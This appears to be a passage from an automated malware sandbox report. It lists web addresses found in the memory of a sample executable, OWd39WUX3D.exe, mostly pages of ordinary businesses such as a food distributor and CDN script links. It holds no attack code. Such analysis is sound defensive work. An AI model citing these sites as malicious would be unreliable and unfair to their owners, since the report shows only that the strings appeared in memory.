OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://js.datadome.co/tags.js
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581365306.0000000004610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://namebright.com
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://napoleongames.be
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&limit=200
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&limit=250&col=class&dir=ASC&term
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&queryCol=&terms=pizza
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&queryCol=class&terms=Mediterran
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&queryCol=class&terms=mexican
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/respond/1.4.2/respond.min.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P-48x48.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/facebook-512-q1jbn3nkxzlg1s7t64rdmt1lwqmyqc
